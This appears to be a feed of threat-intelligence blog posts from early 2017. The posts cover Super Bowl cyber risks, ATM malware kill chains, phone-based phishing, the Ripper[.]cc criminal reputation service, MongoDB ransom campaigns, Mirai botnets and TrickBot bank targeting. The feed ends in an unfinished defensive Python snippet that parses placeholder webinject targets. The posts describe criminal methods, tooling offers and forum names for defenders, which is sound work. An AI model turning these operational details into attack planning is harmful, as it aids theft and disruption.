    Ready for the Blitz: Assessing the Threats to Super Bowl LI Thu, 02 Feb 2017 18:31:35 +0000 Like any major event, Super Bowl LI brings with it the heightened risk of malicious cyber activity. The lead up to last year’s game was dominated by security concerns over cyber attacks given the abundance of fiber optic cables in and around the San Francisco 49ers’ stadium, the venue for Super Bowl L.

    Although we have yet to detect any audible calls to target the 2017 event being held at the NRG Stadium in Houston, we can look back at previous Super Bowl activity, as well as wider comparisons to other major sporting events that we have monitored for an indication of the type of threats that may come to pass this year.

    Touchdown or Tangodown?

    Previous large-scale sporting events such as the 2014 World Cup in Brazil or the 2016 Rio Olympics were beset by hacktivist activity. In Rio we saw a large number of data leaks and denial of service (DoS) attacks. More recently, the African Cup of Nations football tournament experienced two separate DoS attacks, one against the event website itself, while the other successfully disrupted the website of the event’s main sponsor, the French multinational oil and gas company Total. In this case the hacktivists were participating in the OpGabon campaign, which was purportedly established in 2013 to denounce killings conducted for political gain by the current president Ali Bongo.

    While no dedicated campaign against the Super Bowl has surfaced among the hacktivist community, there always exists the possibility that hacktivists will use the global platform of major sporting events as an opportunity to further their ideological goals. Anonymous affiliated actors have already promoted the OpSafeWinter campaign, with one Anonymous actor calling on support for Houston’s homelessness efforts ahead of Super Bowl LI. Moreover, a small community of activists has called for a boycott of this year’s game on the grounds of allegedly restrictive laws passed affecting women’s health in Texas. While neither has been connected to a hacktivist campaign, the point being stressed is that hacktivist actors can at any point leverage a highly publicized spectacle to highlight specific local (or even national) grievances.


    Figure 1: OpSafeWinter campaign material disseminated via Twitter

    Fake Mobile Apps and Phishing Attacks

    Sponsors and organizers are not the only ones at risk; fans and even television broadcasters also have reasons to fear for their online safety. Phishing emails such as the one below, identified by SANS, were used in 2015 to infect victims with credential harvesting malware. Fake apps innocently downloaded by attendees can also be used to hide and distribute malware live during the game.


    Figure 2: Phishing email using Super Bowl lure to deliver malware [Source:]

    Ticketing Violations

    Unsurprisingly, the high demand for tickets opens the gate for ticketing scams. While some sellers will attempt to sell their tickets for extortionate prices, attendees should also beware of sellers who may never come through on their promises. We recently detected the following seller offering Super Bowl ticket packages on two dark web marketplaces. While we could not verify whether the tickets were legitimate, a closer look at the seller’s other online offerings should drive prospective buyers elsewhere. Those still looking for tickets are advised to use trusted ticket merchants, and remember that it’s easy for scammers to set up legitimate-looking sites using techniques such as typo-squatting.


    Figure 3: Dark web marketplace seller offering Super Bowl tickets


    Figure 4: Other great offers by this seller, including fake IDs, tickets and malware tools

    Point of Sale Interceptions

    With hundreds of thousands of fans expected to rush to the Houston area this week, cybercriminals will likely look to profit from the increased number of transactions being made at ATMs and at local stores, hotels and restaurants using point of sale (PoS) software. Only last week it was revealed that customers who used their debit or credit cards at Houston area Popeye’s restaurants were at risk of data theft, after malware was identified in the computer systems at seven locations. Though these potential breaches occurred in mid-2016, we can expect credit card fraud to increase in the week leading up to the Super Bowl.

    Assessing the Field of Play

    Overall, we can group the potential threats into those affecting businesses and those that target supporters:

    Threats to Consumers and Suppliers

    While explicit hacktivist campaigns or evidence of targeted malware has yet to materialize, by anticipating some of the potential threats associated with an event of this scale, sponsors and fans can better tackle all eventualities. Digital Shadows will be monitoring these developments as kick off approaches in case the attackers decide to call the blitz.

    Making Cents of ATM Malware Campaigns – Comparing and Contrasting Operational Methodologies Mon, 30 Jan 2017 13:49:05 +0000 Throughout 2016 some of the most notable reporting on criminal activity targeting the financial sector related to the use of ATM malware by a group of threat actors identified as the “KS Group”, an organized crime group (OCG) believed to be based in Russia. The group adopted a relatively unusual operational methodology in which ATM malware was deployed onto targeted machines ahead of time through a computer network intrusion and then money mules were sent in to activate the malware and collect the cash. However, this type of operation was unusually complex; the majority of reported ATM malware activity has involved mules manually installing malware by physically interacting with targeted machines.

    Manual Infection vs. Network Intrusion

    The organizational charts below show hypothesized versions of how OCGs would need to be structured in order to conduct different types of ATM malware operations.


    Figure 1 – Organizational chart for manual malware deployment.


    Figure 2 – Organizational chart for malware deployment through network intrusion.

    These models show that deploying malware manually requires a much simpler set-up. However, in this model the mules represent a chokepoint – they are forced to spend far longer interacting with each ATM due to the requirement that they force the machine open and go through an installation process. This also increases their physical exposure and operational risk.

    Conversely, the organizational structure for a network intrusion-based operation is complex – the actions of two teams must be coordinated. Moreover, a requirement for specialist personnel to conduct network intrusions is likely to increase operational costs. However, mules are required to spend far less time interacting with each ATM and will not have to engage in obviously suspicious behavior, such as forcing a machine open. This can allow more ATMs to be targeted at once, potentially resulting in a greater sum of money being obtained than would be possible for a physical deployment operation conducted over the same timeframe.

    Informing Defender Action

    Based on these organizational structures and analysis of previous ATM malware operations, hypothesized operational kill chains for both types of operation have been developed. Understanding the different stages of each operation can enable the identification of key points where defender action can increase attacker operational costs or create opportunities to discover an operation.


    Figure 3 – Kill chain for operations where ATM malware is deployed manually.

    The simpler nature of this type of operation means that opportunities for defenders to act are likely to revolve around limiting opportunities to gain unsupervised access to ATMs and prioritizing ATM system updates when new vulnerabilities are identified.


    Figure 4 – Kill chain for operations where ATM malware is deployed through a network intrusion.

    While the more complex nature of this type of operation presents a greater number of opportunities for defenders to act, these opportunities are more fleeting. Mules spending less time interacting with ATMs reduces the likelihood of physical security measures identifying them as acting suspiciously. Furthermore, opportunities for network defenders are heavily dependent on the adoption of best practices across an entire corporate network, a task which can be challenging even for small organizations, let alone multinational banks.


    Reporting of criminal activity involving ATM malware has indicated that although significantly more complex to plan and execute, network intrusion based operations like those carried out by the KS Group have the potential to produce very high profits. While beyond the capability of many criminal groups, more sophisticated criminals are likely to take note of the success of this approach in the future. It is, therefore, important for network defenders to take note of how these types of operations have been conducted in the past in order to prepare for and mitigate such attacks.

    Dial “M” for malware: Two-factor scamming Thu, 26 Jan 2017 17:53:16 +0000 Adversaries are developing new ways of attacking you using old forms of communication. Make sure your communication of this issue is equally as effective.

    Social engineering is a term that covers a broad spectrum of malicious activity and tactics to “exploit the human”. Often this involves tricking people into divulging information or performing tasks that assist an attacker. In recent incidents, we noted the use of phone calls as a prerequisite to a cyber-attack; how are attackers increasingly using this tactic?

    In one recent incident, UK-based educational institutions were warned of a campaign targeting them with ransomware. The attack was initiated by a cold-caller purportedly from the ‘Department of Education’ (rather than the Department for Education) requesting the email address of a senior employee, usually the head teacher. The caller alleged that they had sensitive documents which needed to be sent to the individual rather than a generic inbox. The victim was then targeted with a phishing email containing a malicious attachment seeking to infect them with ransomware.

    In another example, the organized criminal group Carbanak (aka Anunak) also used phone calls as part of their tactics. They reportedly targeted multiple companies in the hospitality sector with malware, potentially to harvest bank card information from point of sale devices. This involved phoning the company claiming to be unable to access an online reservation, emailing them a fraudulent reservation document, and staying on the call whilst the recipient opened the document and inadvertently infected their system with information harvesting malware.

    Similarly, “technical support scams” are another popular tactic whereby users receive calls from a phony tech support or “Windows Support Centre” offering to remove a virus or resolve an imaginary technical problem. Some offer to do this for a fee; others appear more altruistic. The victim is directed to install software which grants the threat actor remote access to their system, following which a variety of malicious acts are undertaken, including malware infection and data theft. TalkTalk customers were warned of these kinds of scams after a customer data breach in October 2015.

    As education and awareness grows regarding the threats of malicious emails and suspicious documents, the addition of the phone-call introduces a new and personalized aspect to the scam. It highlights the efforts to which some threat actors will go, as well as the creativity involved. Accessing the necessary contact telephone numbers is relatively simple. Companies and organizations often publicize a general enquiry number, and the actors then rely on deceiving staff and employees to divulge employee personal contact details. Public directories have long been used by fraudsters for cold-calling, a tactic which has simply been adopted by cyber threat criminals as well. Below is a table highlighting the Strengths, Weaknesses, Opportunities and Threats (SWOT) of this particular scam. SWOT is an effective tool providing both a current view of the threat from the attacker’s point of view, and also an element of forecasting.

    Fig 1: A SWOT of the cold-calling tactic

    Along with efforts to educate employees on the associated risks, another line of defence is for companies to use call answering services, which can help to triage out potential malicious calls. The advice is to treat all unsolicited calls with scepticism and suspicion, do not provide personal or financial information to the caller, and certainly do not agree to install software on to your device unless you are confident of its purpose. As with all scams, it’s better to be safe than sorry.

    Organizations affected by data breaches, which then may expose customers or employees to these kinds of approaches are advised to develop “playbooks” of how to respond in the event of such incidents happening. This might include the reissue of credentials where possible and the provision of appropriate guidance and awareness to those individuals affected.

    Innovation in The Underworld: Reducing the Risk of Ripper Fraud Mon, 23 Jan 2017 22:11:16 +0000 Reputation is incredibly important for business. This also applies to cyber criminals who buy and sell goods and services in online marketplaces. Fraud between cyber criminals has always been an issue that limited the profitability of their malicious campaigns. Those who commit fraud, often known as “rippers,” commonly engage in activities such as:

    • Selling dumps of fake social media credentials
    • Selling invalid or used stolen credit cards
    • Stealing money by not delivering promised goods

    From the defender’s perspective, rippers can be beneficial. A 2009 Microsoft paper argued that, in essence, cyber criminal markets are lemon markets where buyers can’t differentiate low- and high-quality goods, therefore providing a breeding ground for rippers. Every transaction within the market then comes with a “ripper tax” attached to it, decreasing profits for both legitimate buyers and sellers. This, in turn, slows the market down and makes further cyberattacks less lucrative.

    So if rippers are beneficial to defenders, why are we writing about this and why should you care? Because a new service has emerged that’s aimed at revealing rippers and reducing the problem of fraud so that cyber criminal marketplaces can flourish.

    In June 2016, “Ripper[.]cc” came online looking to disrupt this niche. Ripper[.]cc is a database of rippers and currently contains close to one thousand ripper profiles. Visitors can create profiles including the ripper’s identities across multiple forums. The profiles include various contact and identification information, as well as the details of the specific scamming case (known as a “black”).

    Figure 1: The Ripper[.]cc front page

    Ripper[.]cc is not the first attempt to shield the marketplace from ripper tax. Prior to Ripper[.]cc, a number of methods had been devised to minimize the risks associated with rippers with limited success:

    1. First is the escrow system. A marketplace user (usually an administrator) trusted by both sides of a transaction will hold the buyer’s money until the transaction is confirmed. The escrow system is great at facilitating trust, but can be slow, inconvenient and requires a very trustworthy third party.

    2. The second solution is blacklists. Most cyber criminal forums have an arbitration section and administrators can ban users for various reasons, being a ripper among them. This however does not stop a ripper from operating on other forums or interacting with “victims” directly (e.g. through jabber instant messaging).

    Figure 2: An example blacklist on a criminal forum (Source: https://f*ckav[.]ru/forumdisplay.php?f=55)

    3. Finally, the service kidala[.]info (“kidala” is Russian for ripper) has been aggregating a database of rippers since 2005. It is useful because it offers a large amount of ripper information and is also independent from any forums. However, it has all of the limitations of forum blacklists. Furthermore, users have complained that the reporting is not always impartial and it is possible to remove the ripper status for money.

    More than a facelift

    While the UI of Ripper[.]cc is impressive, the creators of the service do not appear to have been satisfied with a more usable, cleaner-looking version of kidala. Ripper[.]cc offers Firefox and Chrome extensions, as well as a jabber (PsiPlus) plugin. These extensions seek to address the main issue with forum and kidala blacklists – the fact that they only exist on those individual platforms. The plugins highlight rippers present in the Ripper[.]cc database in the user’s browser and jabber chats, allowing customers to recognize rippers with ease.

    Figure 3 (a, b): 2 examples of Ripper[.]cc in action. The top (a) is the jabber plugin and the bottom (b) is the browser extension (source: screenshots from Ripper[.]cc)

    The extensions highlight known rippers either directly on the site’s page or within the PsiPlus application (Figure 3a). The browser extensions (Figure 3b) allow the customer to easily pivot to the profile on Ripper[.]cc, revealing the ripper’s identifying information, forum accounts and the reason they were blacklisted. The relevant data is fed to the extensions once every 30 or 60 minutes via the Ripper[.]cc API.

    Taking a page from legitimate startups

    The development of the Ripper[.]cc service is of interest as it parallels how legitimate technology startups develop their products. The initial idea for this service was discussed on exploit[.]in as early as mid-2015 (forum[.]exploit[.]in/index.php?showtopic=98556&st=0). The project’s “founders” officially revealed the service (Figure 4) in July 2016 via a forum post, after having some difficulties recruiting programmers to develop it for them (see Figure 6). In the post, they invite customers to the forum and start a discussion about its features and problems.

    Figure 4: Original promotion of the forum on exploit[.]in 

    In this initial posting or “pitch” and subsequent discussions, clear similarities can be seen between this and legitimate technology startups. The founders plainly acknowledge their intention to displace the previous main player – – and try to win customers over by promising better features. They also have to prove their credentials – in this case by saying that a number of well-known forums support this project and their existing reputation on these forums.

    Just like real startups, monetization is brought up as a key consideration, with suggestions such as an advertising or a subscription-based payment model. While this is normally brought up by investors seeking to understand how they will make money, in this case, the potential customers are the ones who want to know. But not for the same reason. Without understanding how Ripper[.]cc makes money, the customers can’t trust it. Perhaps the plugins could be malicious or rippers could be added or removed for money. The team responds that source code will be open source and that, at least initially, advertising will provide the main income (indeed, ads can be seen on the site now ripper[.]cc/ads). Furthermore, trust is to be facilitated by including administrators from four well-known forums in the service’s arbitration team.

    Figure 5: English-language version of the site’s reporting functionality (Source: Ripper[.]cc)

    Interestingly, the team behind the service has bigger plans for the project, demonstrating their ambitions for “scaling up.” The site already has an English version (Figure 5) and they want it to become a universal service for finding rippers online – cyber criminal marketplaces are just their proof of concept. An escrow service (another possible income stream) and even a mobile application have also been considered (Figure 6).

    Figure 6: Discussion between one of the assumed founders of the project (user 2) and a programmer (user 1) that user 2 is trying to recruit to do some work on the project (Source: Publicly available Jabber chatlogs)

    Despite a consistent number of profiles being added to the site since July 2016 (Figure 7), it is currently unclear whether the popularity of the service will grow significantly, although there is already evidence of its use across multiple marketplaces (including the four founding forums; see Figure 4).

    Figure 7: Average age of ripper profiles on Ripper[.]cc

    Ripper[.]cc is another example of the industrialization of hacking and the growing professionalism of cybercrime. If such a service becomes successful, it enables cyber criminals to significantly reduce the risks associated with rippers and the overall cybercrime economy can become more profitable allowing for further growth.

    To learn about other digital risks and how to better manage them, download our report: Digital Risk Management – Identifying and Responding to Risks Beyond the Boundary.

    Known Unknowns: Key Events to Keep Your Eyes Out for in 2017 Thu, 19 Jan 2017 12:58:20 +0000 On Friday, millions will tune in to see Donald Trump inaugurated as the President of the United States. This will be just 3 weeks after the US Office of the Director of National Intelligence (ODNI) published a declassified version of a U.S. intelligence community assessment (ICA) on Russian operations reportedly conducted with the intention of influencing the outcome of the 2016 U.S. presidential election.

    The report made a number of highly significant assessments, most notably that Putin personally ordered an influence operation intended to undermine U.S. public confidence in the electoral system and negatively impact the electability of Hillary Clinton. The report stated that the influence operation was conducted using a combination of methods, including targeted network intrusions, the use of deniable entities to disclose proprietary materials and a “propaganda campaign” conducted by Russian state media and semi-independent “trolls”.

    However, this is just one recent example of cyber related activity that is tied to geopolitical events. To use Rumsfeld terminology (apologies, everyone), many of these are unforeseen, unknown unknowns that institutions must be resilient to. However, there are also many known unknowns; key dates in 2017 that are likely to involve an element of cyber activity. In the table below, I’ve outlined what I see as the key known events of 2017.

    2017 Key Events

    You’ll notice that there are at least six significant elections set to take place in 2017. With elections set to take place in the Netherlands, France, Hong Kong, Germany and South Korea, political parties, government institutions and media organizations should not be caught unaware. There are already concerns. Ahead of the German election, Facebook announced a fake-news filtering service for their German users. It’s also no surprise that the French authorities are bolstering their own security ahead of their election.

    Of course, it’s not all about a game of chess between nation states, however. In June, the Confederations Cup will begin in Russia and, if the World Cup and Olympics are anything to go by, the sponsors of the competition may expect to be targeted.

    At the lower end of the capability spectrum, hacktivist campaigns like OpIsrael and both reoccur annually. While the campaigns have received less and less attention as the years have passed, by monitoring for activity levels associated with these campaigns, organizations can be better prepared for emerging threats.

    While you can’t predict what’s going to happen in 2017, by understanding which events may have an impact on your industry or geography, you can plan ahead for these.

    Two Ways to Effectively Tailor Your Intelligence Products Tue, 17 Jan 2017 14:01:53 +0000 In my previous blog, “Trump and Intelligence: 6 ways to deal with challenging intelligence consumers,” I focused on six ways to effectively communicate and tailor intelligence to uninformed and/or difficult executive audiences. I want to make this a blog series and expand upon some of my guidance from that blog. I am cheating a bit; I’m using this blog to build out content for my World War II themed SANS Cyber Threat Intelligence Summit presentation, “Inglorious Threat Intelligence.”

    Today, I want to dig a bit deeper into aspects of the intelligence consumer. I suggested building briefing dossiers for your intelligence consumers. Dossiers are a long-standing intelligence product for the IC; they are often used by policy makers to better understand foreign leaders. During World War Two, Harvard Professor Henry Murray was commissioned by the Office of Strategic Services to conduct a personality analysis of Adolf Hitler. The goal of the analysis was to attempt to predict his future behaviors and develop suggestions for dealing with him during and after the war (see Image 1).

    Image 1. Analysis of the personality of Adolf Hitler.

    There are several ways we can adapt dossiers to our own security programs.

    1. Develop threat intelligence consumer personas. Buyer personas come out of the marketing world. Buyer personas are developed to better understand the target customer. Buyer personas can include the individual’s concerns, needs, motivations, skills, and reporting structure. Using personas to better understand prospects and customers ensures that what you produce is beneficial and tailored to that group of individuals. Take a look at this article for additional detail. Buyer personas can be adapted for threat intelligence consumers; by better understanding who you are producing intelligence for, you can improve the overall quality of your production. I think a key point to draw out is that in this scenario you are producing intelligence versus simply consuming intelligence from a third party. This is an important step in the maturation of a threat intelligence capability. Some example intelligence consumer personas include the following roles:

    a. Security Operation Center analyst

    b. Threat hunter

    c. Chief Information Security Officer

    d. Other C level executives

    e. Business unit / Line of business leader

    2. Build briefing dossiers for specific intelligence consumers. For some of your intelligence consumers, you are going to need to have more detail. Personas address a functional area within the organization, whereas dossiers are specific to an individual, a very strategic consumer of your intelligence. When building out dossiers for specific consumers you should include the following:

    a. What is the ideal outcome when working with this individual? Are you seeking to influence the policy of your organization? Are you attempting to educate the individual on the threat landscape? Whatever your goal is, and you should have one, you need to have it documented and then make sure any intelligence product you develop aligns with your goals.

    b. After each interaction with one of these strategic intelligence consumers, you need to conduct an after-action review. What was effective in the interaction? What was ineffective? Capturing this information is critical to your success. The more positive “touches” you can get with these strategic consumers the better. You can set yourself up for positive interactions.

    c. In the event you have never read Dale Carnegie’s best-selling book “How to Win Friends and Influence People,” I highly recommend that you do so (see image 2). Carnegie was quite the social engineer; this book remains highly relevant today and can help you to effectively communicate.


    Image 2. “How to Win Friends & Influence People”

    In future blogs in this series, I’m going to dig deeper into the creation of these intelligence consumer personas as well as a how to establish a framework for constructing dossiers on your strategic intelligence consumers.

    All You Can Delete MongoDB Buffet Thu, 12 Jan 2017 13:45:19 +0000 A number of extortion actors were detected accessing unauthenticated MongoDB installations and replacing their contents with a ransom note, usually containing an email and Bitcoin address and the usual “we have your data” message. The earliest activity we observed was from December 20, 2016, at which time there appeared to be only one actor conducting the activity, using the nickname “harak1r1”. Since then, the number of actors involved (or at least the number of unique identifiers) increased; on January 10, 2017, that number was at 11. Approximately half of these actors had received ransom payments (between 0.2 BTC and 0.5 BTC) based on the transactions made into their Bitcoin addresses. Their overall earnings were relatively low, with the highest at around $7,962 USD. This isn’t bad considering the low capability, the low amount of resourcing required and the short duration of the activity. When last checked, the reported number of affected instances was between 27,000 and 28,000.

    On January 6, we set up a honeypot running a MongoDB installation without authentication. At some point over the following weekend it was ransomed (the contact email given was kraken0[at]india[.]com). The short time between establishing this honeypot and a ransom note appearing, coupled with the reported number of infected installations over a couple of days, showed the pace at which this activity was occurring.

    Fig 1 – A screenshot of the ransomware demand from our honeypot 

    On January 11, an actor purporting to be “kraken0” uploaded an advertisement for “MongoDB ransomware” to the text-sharing site Pastebin (see Fig 2). The advertisement for this purported ransomware suggested it was written in the C# language. The author of the post claimed the script could handle “1,000 IPs per second” and that this could be higher with the necessary infrastructure. The author claimed the CPU load of the script was low but that RAM was important if the operator was using a large list of IPs. A list of IPs was purportedly included in the source code.

    Fig 2: A Pastebin post from January 11, 2017 

    Overall, the package offered included the “kraken” source code, 100,000 IP lists with open MongoDB installations and a mass MongoDB scanner. This was offered for $200 USD in Bitcoin and could be purchased by contacting the actor’s email address. We previously assessed it as almost certain that at least some of the actors involved were using automated scripts to scan for Internet-facing, unauthenticated MongoDB installations, following which the contents would be replaced with a ransom note containing actor identifiers.

    At the time of writing, the identifiers associated with the “kraken0” actor were independently reported to have been discovered on 21,642 open MongoDB installations. Research into the Bitcoin addresses associated with the actor showed they had received a total of $7,962 USD spanning 95 transactions since January 7. The actor had withdrawn all of these funds from the address as of January 11. It was not confirmed whether all of these transactions were ransom payments.

    While we had not detected enough evidence to judge whether this was a genuine offering at the time of writing, the use of an automated script to identify open MongoDB installations is consistent with our previous assessments of this extortion activity. Some of the capabilities described by the actor were within the realms of possibility and, should they be genuine, provide some explanation for the number of MongoDB installations the actor managed to affect when compared to other actors conducting similar extortion attempts. However, the claims around the CPU load of the script and the contents of the offering could not be judged. The actor kraken0 has demonstrably received ransom payments from at least some of the affected victims, and if this is a genuine offering it would suggest the actor likely intends to discontinue their extortion activity and instead attempt to sell their tools.

    We had previously assessed that the number of actors conducting the extortion activity would cause overlapping extortion attempts and reduce the viability of this method over time. This offering is a possible indication the actor kraken0 had decided the tactic they were using was no longer profitable or viable, or that the actor was attempting to take the ransoms they had received and disappear. It is considered less likely the actor intended to continue their activity after selling their tooling, as this had the potential to create unnecessary competition for a method that had been lucrative.

    10 Ways You Can Prepare for DDoS Attacks in 2017 Wed, 11 Jan 2017 15:10:23 +0000 At the end of last month, we published a paper that forecasted the DDoS landscape for 2017. By using the cone of plausibility, we were able to confront our current assumptions and assess the different ways in which denial of service poses threats to organizations in 2017.

    Since the Mirai source code was released by a user on several months ago, the DDoS landscape has evolved. It’s important that we understand the continuing development of botnets at a broader level. However, it is equally important not to lose sight of other DDoS threats. By understanding Mirai in a broader context, we can consider how the DDoS landscape will evolve over the next year and align security programs accordingly.

    Figure 1: Post by user “anna-senpai” on on October 1, 2016

    To build resiliency against DDoS attacks into your security programs, we recommend the following ten steps:

    10 Steps to Prepare for DDoS Attacks

    Trump and Intelligence: 6 Ways To Deal With Challenging Intelligence Consumers Wed, 04 Jan 2017 15:28:02 +0000 It is no secret that President-elect Trump is skeptical of the Intelligence Community (IC). He has openly questioned Russia/US election “hacking” on many occasions. This week he tweeted:


    Trump has also shunned the longstanding Presidential Daily Intelligence Brief. The Washington Post wrote about it here: “Trump turning away intelligence briefers since election win.”

    President Trump doesn’t have a full understanding of intelligence tradecraft, how organizations are compromised, or the incident response process. Just to be clear, I have no partisan or hyperbolic intentions with these statements. First, he tweets about catching the “hackers in the act.”

    Trump Hackers In The Act

    Second, Trump quotes Assange and talks about the DNC being so careless. He doesn’t understand that “careless” is the status quo, regardless if you are a political organization or a Fortune 500 company. He also minimizes the threat from teenager “hackers.” During the Presidential Debates, Trump alluded to 400 pound hackers sitting in their beds.

    Trump Podesta Assange Tweet

    It can be easy for those of us in the cyber security and intelligence communities to scoff at Trump’s perspective of these issues. The reality is that over the next four years, Trump is going to be a challenging consumer of intelligence products. To have any chance of successfully communicating with Trump, the IC is going to have to tailor their products to this very difficult intelligence consumer.

    There are lessons that we can apply to our own organizations. When it comes to technology and cyber security, Trump isn’t that different from most of your key executives. They aren’t technologists; they aren’t practitioners, and they certainly don’t understand things that we know to be true. With this in mind, I want to focus on six ways to effectively communicate and tailor intelligence to uninformed and/or difficult executive audiences.

    1. Use their terminology; not yours. Those of us from both the intelligence and cybersecurity communities have a tendency to use our own abbreviations and terminology. Unless your intelligence consumer comes from your community, they won’t understand what you are trying to communicate. Use their own lexicon and analogies to help communicate your message.
    2. Focus on what they care about. If you are creating products for a technical audience, Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) are fine. They aren’t acceptable for executive level products. Business risk, assets, liabilities, profit and loss are terms executives are interested in. This has been said for many years; yet the problem persists.
    3. Create a personal story that resonates with your consumer. With as expansive as Trump’s business interests are and how pervasive intrusions are, it is highly likely that one of his companies has suffered a breach. The impact to his own business interests could be used to help Trump understand how intrusions work and what their impact is. Learn the art of storytelling and come up with a narrative that your audience can personally identify with.
    4. Build briefing dossiers on your intelligence consumers. You build dossiers on your adversaries, so why not build them for your intelligence consumers? What are their trigger words? What are they passionate about? Understanding and documenting what to say and what not to say is key for effective communication with a challenging consumer. Capturing this information is key; you need to learn from your successes and failures. Given the rate of turnover within organizations, capturing this knowledge is important for continuity of production.
    5. You may have to alter your existing practices. Just because you have historically done something doesn’t mean the approach can automatically be applied to a new intelligence consumer. In Trump’s case, the IC might have to shift from the daily intelligence briefing to a weekly intelligence briefing. (I know this is a foreign concept to many of us from the IC who have directly or indirectly contributed to the PDB.) When it comes to intelligence products, one size doesn’t fit all. You will have to tailor your intelligence product’s format and timetable to the audience.
    6. Engage with them outside of official work channels. Look for ways to interact with your intelligence consumers outside of official forums and meetings. Would they be willing to mentor you? Could you take them out for lunch or coffee? This should resonate with people from our space: come up with a benign social engineering strategy to establish trust that will be the foundation of an ongoing relationship.

    Challenging intelligence consumers aren’t going away, so you must develop a strategy to make the best of the situation. Shifting an intelligence consumer from an uninformed or adversarial position to a champion can be successful. I’d love to hear your ideas for helping this shift be successful.

    Mirai: A Turning Point For Hacktivism? Fri, 16 Dec 2016 16:36:34 +0000 A “digital nuclear attack”. A “zombie apocalypse”. “The end of history.”

    Much has been made of Mirai, the recently discovered malware that incorporates Internet of Things (IoT) devices into botnets capable of conducting the largest distributed denial of service (DDoS) attacks measured to date. Some reports have focused on the in-depth technical detail behind the malware, while others have taken the hyperbolic route: cue images of zombie fridges and the impending digital Armageddon.

    But what hasn’t really been explored is Mirai’s potential impact on the activities of particular threat actor groups. Our latest whitepaper forecasts the threat posed by these different groups. This blog focuses on one group in particular, hacktivists.

    Although some hacktivist attacks have been impactful, most are low-level, unsubstantiated, and result in minimal disruption to targeted organizations. Hacktivists have high levels of intent, though often lack the technical capability to back this up.

    Mirai, however, could be a game-changer for hacktivism. In late September the malware’s source code was posted online and was freely available to download. Since then a link to a GitHub repository containing the source code has been posted to an OpIcarus Facebook page (see Figure 1 below).

    Figure 1: Mirai source code posted to OpIcarus Facebook page

    In the context of hacktivism, these developments are significant for two reasons:

    1. Stronger, more impactful attacks. Hacktivists are usually motivated by a mix of ideological concerns and a desire to show off their power. Mirai would be an ideal means to achieve the latter. The attack on Brian Krebs had a peak volume of 620 Gbps, while that on the France-based internet service provider OVH reportedly measured over 1.5 Tbps. Hacktivist operations that have previously been seen as presenting only a very low threat may now take on added significance if participants are armed with IoT botnets.

    2. Changing tactics – The attacks on Brian Krebs, OVH and DynDNS underlined Mirai’s ability to cause a significant disturbance to these services, and this disruptive capability might allow hacktivist actors to perform more sophisticated operations in future.

    The attack against the Sony PlayStation Network in 2011 resulted in the company taking the network offline for a number of days and the theft of personal data belonging to 77 million customers. It later transpired that PlayStation had been bombarded with DDoS attacks, which made it more difficult for the company to detect the intrusion. A powerful Mirai attack that takes a targeted site offline for a considerable amount of time could therefore be used as a smokescreen for other types of attack, such as SQL injection to steal data, or could even be run alongside physical protests. Some may also begin extortion activities, as the fear of Mirai could allow hacktivists to solicit funds from their victims or blackmail them into acceding to their particular cause.

    While the above may sound ominous, we should not make the mistake of thinking we’re on a one-way road to perdition. We should bear in mind the following:

    1. A certain level of technical capability is still needed to operate Mirai

    Although the source code has been released publicly, this does not necessarily mean that any individual can simply pick it up and launch a high-volume DDoS attack. Even before Mirai, many hacktivists sought the aid of stresser and booter services to help them launch DDoS attacks as they were unable to do so themselves. These services are likely to remain popular among novice users as they often provide real-time assistance and troubleshooting features, with some level of anonymity. A number of discussions we’ve detected on hacking forums already show that novice users are struggling to make use of Mirai, and that fellow users have not been so forthcoming in sharing their secrets.

    Figure 2: Desperate Mirai users on HackForums

    Despite this, “Mirai-as-a-service” offerings have already been detected – indicating that cybercriminals are attempting to monetize their Mirai capabilities in similar fashion to stresser and booter services. It remains to be seen, however, whether these become popular and if they even function as advertised.

    2. Land of plenty? Attackers are in competition for the IoT resource pool

    The original Mirai variant was believed to be able to target between 200,000 and 500,000 devices. A more recent variant, however, dubbed ‘Annie’ by its creator, can allegedly infect up to five million vulnerable devices. Though these estimates are concerning, we shouldn’t assume that attackers are inhabiting a socialist utopia where devices are freely available and shared for public use.

    Instead, attackers are competing directly with each other for control of these devices, which means it’s likely a few select individuals or groups are able to operate the largest botnets. Already there have been reports that the competition for devices has fractured Mirai’s power, creating a series of smaller botnets capable of smaller attacks. Attackers are now furiously searching for new infection vectors to gain an advantage over their competitors. Since the release of the Mirai source code, there have been reports of new Mirai variants that target new devices using different techniques. So although high-volume attacks are still a threat, the competition over the IoT resource pool will limit the ability of hacktivists to commandeer the most powerful botnets.

    3. Extortion threats are often hollow

    A number of actors will hope that targets do not call their bluff when threatened with Mirai. Users of the Web Hosting Talk forum reported receiving Mirai extortion emails demanding a ransom of two Bitcoin (approximately $1320 USD). These appear to have been empty threats, with no attacks taking place after the stated 96-hour window expired.

    Figure 3: Extortion email threatening a Mirai attack [Source: Web Hosting Talk]

    It may be too early to state with complete confidence whether or not Mirai will change the practice of hacktivism. By continuing to monitor developments within the hacktivist community, however, and by forecasting what the post-Mirai landscape might look like in future, we can better prepare ourselves for these eventualities.

    Coming to a Country Near You? The Rapid Development of The TrickBot Trojan Fri, 16 Dec 2016 16:29:19 +0000 Since the discovery of TrickBot in September 2016, its operators have continued to develop the malware to include the targeting of new locations and customers of new banks. This was demonstrated both by independent reporting and by Digital Shadows’ analysis of the configuration files used by the malware. These files contain bank domains and URLs which, when visited by an infected user, trigger webinjects that modify the web page content shown to the visitor and allow credentials to be harvested by an attacker. Furthermore, the domains in the configuration gave an insight into the targeting choices of the malware’s operators, both in terms of the countries and the specific banks targeted. The timeline below outlines recent developments in this trojan’s targeting.
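    The kind of configuration triage described above, as an added illustration written for this page (it is not Digital Shadows’ tooling, and the entries are not taken from any real TrickBot configuration): the Python below takes a constructed list of webinject target patterns, shows which visited URLs would trigger an entry, lists the entries that sit under an organisation’s own domains, and aggregates the targets by country inferred from the public suffix, the same style of per-location count shown in Figure 1 below. The target entries, the suffix-to-country table and the organisation domain list are all constructed for the example.

```python
import fnmatch
import re
from collections import Counter

# Constructed sample of webinject target patterns in the style of a banking
# trojan configuration. Each entry is a URL glob: when an infected browser
# loads a matching page, the inject modifies the content shown to the user.
# All domains are placeholders, not entries from any real configuration.
SAMPLE_TARGETS = [
    "https://online.bank-a.example.com.au/login*",
    "https://*.bank-b.example.ca/",
    "https://secure.bank-c.example.co.uk/*",
    "https://www.bank-d.example.com.au/*",
    "https://*.bank-e.example.com/ibank*",
]

# Constructed public-suffix-to-country table (assumption for this example:
# the location of a target is inferred from its public suffix alone).
SUFFIX_COUNTRY = {"com.au": "AU", "ca": "CA", "co.uk": "GB", "com": "unknown"}


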